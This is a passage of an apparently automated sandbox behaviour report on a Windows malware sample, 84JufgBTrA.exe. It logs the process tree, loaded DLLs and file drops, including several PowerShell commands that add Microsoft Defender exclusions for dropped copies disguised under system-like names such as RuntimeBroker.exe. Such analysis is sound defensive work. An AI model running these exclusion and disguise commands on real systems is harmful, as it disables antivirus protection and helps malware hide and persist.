                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 41D8Sq4Amo.38.dr, JX99Ui9DKP.38.dr, KPnOeUK2hC.38.dr, WiyvhDEUt3.38.dr, 7HPrQ3iRpB.38.dr, sMpX30z8nf.38.dr, 07mQC2qkqc.38.dr, xIRy7cT0TR.38.dr, 1XquzIm2yn.38.dr, R7BqvEYBD4.38.dr, J6AWrf32cf.38.dr, ccuFnUOYDP.38.dr, y1RRv9Vvha.38.dr, OXRiWuigiF.38.dr, l9JFYzHTae.38.dr, RXZbWi86Jz.38.dr, HdaAl8ha4c.38.dr, 5TAeaj1clT.38.dr, ySZGCfyqzM.38.dr, 239f1iyBT2.38.dr, NU0jamWTKp.38.dr, WNa7C4RjEo.38.dr, 5DcaR7Ru1G.38.dr, UhyiGUzGJM.38.dr, O5gjxwzfB0.38.dr, tLH0kI3Umz.38.dr, bnfAeo81ZD.38.dr, lGyohRsTwz.38.dr, cfulouQZn9.38.dr, aK4aolTbbR.38.dr, viOyRYnl3k.38.dr, FjYPCsB9aj.38.dr, FTVa4y9vCu.38.dr, FDjPTk1pNt.38.dr, swWu7GQPWr.38.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 84JufgBTrA.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile read: C:\Users\user\Desktop\84JufgBTrA.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\84JufgBTrA.exe "C:\Users\user\Desktop\84JufgBTrA.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe
                      Source: unknownProcess created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknownProcess created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: unknownProcess created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: unknownProcess created: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"
                      Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ktmw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
